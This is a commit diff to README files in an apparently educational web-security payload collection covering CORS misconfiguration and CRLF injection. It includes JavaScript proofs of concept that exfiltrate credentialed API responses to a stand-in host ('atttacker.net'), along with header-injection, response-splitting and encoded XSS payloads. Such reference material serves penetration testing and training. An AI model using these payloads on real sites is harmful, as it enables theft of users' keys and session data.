CORS and CRLF README.md updated

2024-04-20 09:13:53 +02:00 · 2020-10-25 11:07:50 +01:00 · 2020-10-25 11:07:50 +01:00 · 570213a2f8
parent 3671248485
commit 570213a2f8
2 changed files with 84 additions and 12 deletions
--- a/Misconfiguration/README.md
+++ b/Misconfiguration/README.md
@ -14,15 +14,10 @@
 * [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
 * [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html)

-## Prerequisites
-
-* BURP HEADER> `Origin: https://evil.com`
-* VICTIM HEADER> `Access-Control-Allow-Credential: true`
-* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`

 ## Exploitation

-Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
+Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.

 ### Vulnerable Example: Origin Reflection

@ -43,6 +38,8 @@ Access-Control-Allow-Credentials: true

 #### Proof of concept

+This PoC requires that the respective JS script is hosted at `evil.com`
+
 ```js
 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
@ -173,6 +170,75 @@ function reqListener() {
 };
 ```

+### Vulnerable Example: Expanding the Origin / Regex Issues
+Occasionally, certain expantions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. 
+
+#### Vulnerable Implementation (Example 1)
+
+In this scenario any prefix inserted in front of `example.com` will be accepted by the server. 
+
+```
+GET /endpoint HTTP/1.1
+Host: api.example.com
+Origin: https://evilexample.com
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: https://evilexample.com
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+
+```
+
+#### Proof of concept (Example 1)
+
+This PoC requires the respective JS script to be hosted at `evilexample.com`
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://api.example.com/endpoint',true); 
+req.withCredentials = true;
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
+#### Vulnerable Implementation (Example 2)
+
+In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain.
+
+```
+GET /endpoint HTTP/1.1
+Host: api.example.com
+Origin: https://apiiexample.com
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: https://apiiexample.com
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+
+```
+
+#### Proof of concept (Example 2)
+
+This PoC requires the respective JS script to be hosted at `apiiexample.com`
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://api.example.com/endpoint',true); 
+req.withCredentials = true;
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
 ## Bug Bounty reports

 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
@ -188,3 +254,4 @@ function reqListener() {
 * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
 * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
 * [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
+* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
--- a/Injection/README.md
+++ b/Injection/README.md
@ -16,13 +16,13 @@

 Requested page

-```powershell
+```http
 http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
 ```

 HTTP Response

-```powershell
+```http
 Connection: keep-alive
 Content-Length: 178
 Content-Type: text/html
@ -45,7 +45,7 @@ http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23

 HTTP Response

-```powershell
+```http
 HTTP/1.1 200 OK
 Date: Tue, 20 Dec 2016 14:34:03 GMT
 Content-Type: text/html; charset=utf-8
@ -70,13 +70,13 @@ X-XSS-Protection:0

 Requested page

-```powershell
+```http
 http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
 ```

 HTTP response

-```powershell
+```http
 Set-Cookie:en
 Content-Length: 0

@ -92,7 +92,7 @@ Content-Length: 34

 Using UTF-8 encoding

-```powershell
+```http
 %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
 ```

@ -103,6 +103,11 @@ Remainder:
 * %E5%98%BE = %3E = \u563e (>)
 * %E5%98%BC = %3C = \u563c (<)

+
+## Exploitation Tricks
+* Try to search for parameters that lead to redirects and fuzz them
+* Also test the mobile version of the website, sometimes it is different or uses a different backend 
+
 ## References

 * https://www.owasp.org/index.php/CRLF_Injection